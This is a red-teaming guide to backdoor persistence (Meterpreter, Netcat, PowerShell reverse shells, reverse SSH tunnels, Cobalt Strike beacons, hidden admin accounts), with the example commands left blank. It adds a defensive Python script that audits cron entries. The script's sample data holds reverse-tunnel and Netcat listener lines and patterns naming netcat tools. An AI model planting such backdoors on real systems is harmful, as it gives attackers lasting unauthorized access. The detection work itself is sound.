Backdoors
Practical Guide to Backdoors in Red Teaming
Backdoors are tools or methods used by attackers to maintain persistent access to a compromised system. In a red teaming context, backdoors allow penetration testers to ensure they can return to a system even if the initial access vector is closed. Below, we'll explore practical techniques for implementing and using backdoors.
Creating a Persistent Meterpreter Session
Tool: Metasploit
Steps:
Exploit a vulnerability to gain an initial foothold.
Migrate to a stable process to maintain the session.
Set up persistence with a Meterpreter script.
Once the session is established:
This command sets up a persistent Meterpreter backdoor that will start every time the user logs in.
Using Netcat for a Simple Backdoor
Tool: Netcat
Steps:
Transfer Netcat to the target system.
Set up a persistent listener on the target system.
Example:
To make it persistent, add the command to a startup script:
Using PowerShell for Windows Persistence
Tool: PowerShell
Steps:
Create a PowerShell script to establish a reverse shell.
Use Task Scheduler to run the script at startup.
Example:
Save this script and schedule it using Task Scheduler:
Creating a Reverse SSH Tunnel
Tool: SSH
Steps:
Set up a reverse SSH tunnel to maintain access.
Example:
To make it persistent, add the command to cron:
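Seen from the defending side, the two Linux persistence methods above (a Netcat listener launched from a startup script, a reverse SSH tunnel re-established from cron) leave entries that can be audited. The following is an added example, not part of the original page; the sample lines, host names and the function names `classify` and `audit` are constructed for illustration.

```python
import os
import re
import shlex

# Constructed sample entries, as they might appear in a crontab or rc.local.
SAMPLE_LINES = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/rsync -a /srv/data backup.example.invalid:/srv/backup",
    "@reboot /usr/bin/ssh -f -N -R 2222:localhost:22 svc@relay.example.invalid",
    "*/10 * * * * /tmp/.cache/nc -l -p 4444",
    "@reboot /usr/bin/ssh -fNR 2222:localhost:22 svc@relay.example.invalid",
    "15 2 * * * /usr/bin/ssh backup@store.example.invalid /usr/local/bin/rotate",
]

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
# ssh flags that take no argument may be bundled in front of -R (e.g. -fNR).
SSH_REMOTE_FWD = re.compile(r"-[46AaCfGgKkMNnqsTtVvXxYy]*R")
# Netcat listen mode, alone or bundled with other short flags (e.g. -nvlp).
NC_LISTEN = re.compile(r"-[A-Za-z]*l[A-Za-z]*")


def classify(line):
    """Return 'reverse-ssh-tunnel', 'netcat-listener' or None for one entry."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    try:
        tokens = shlex.split(line)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        tokens = line.split()
    for i, tok in enumerate(tokens):
        name, args = os.path.basename(tok), tokens[i + 1:]
        if name == "ssh":
            for j, arg in enumerate(args):
                # "-o RemoteForward ..." is the long spelling of -R.
                opt = arg[2:] if arg.startswith("-o") else ""
                if arg == "-o" and j + 1 < len(args):
                    opt = args[j + 1]
                if SSH_REMOTE_FWD.match(arg) or opt.lower().startswith("remoteforward"):
                    return "reverse-ssh-tunnel"
        elif name in NETCAT_NAMES:
            if any(a == "--listen" or NC_LISTEN.fullmatch(a) for a in args):
                return "netcat-listener"
    return None


def audit(lines):
    """Return (line_number, finding, text) for every flagged entry."""
    return [(n, f, l) for n, l in enumerate(lines, 1) if (f := classify(l))]
```

A hit is a lead to review, not a verdict: legitimate jobs also use remote forwards, and a remote command that itself contains `-R` will be flagged.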
Deploying Custom Backdoor with C2 Framework
Tool: Cobalt Strike
Steps:
Use Cobalt Strike to create a custom beacon.
Deploy the beacon on the target system and set it to call back periodically.
Example:
In Cobalt Strike:
Hidden User Accounts: Creating hidden user accounts with elevated privileges.
Example: Creating a Hidden Admin User on Windows:
Impact: The hidden user account provides the attacker with administrative access.
Some useful Backdoor references: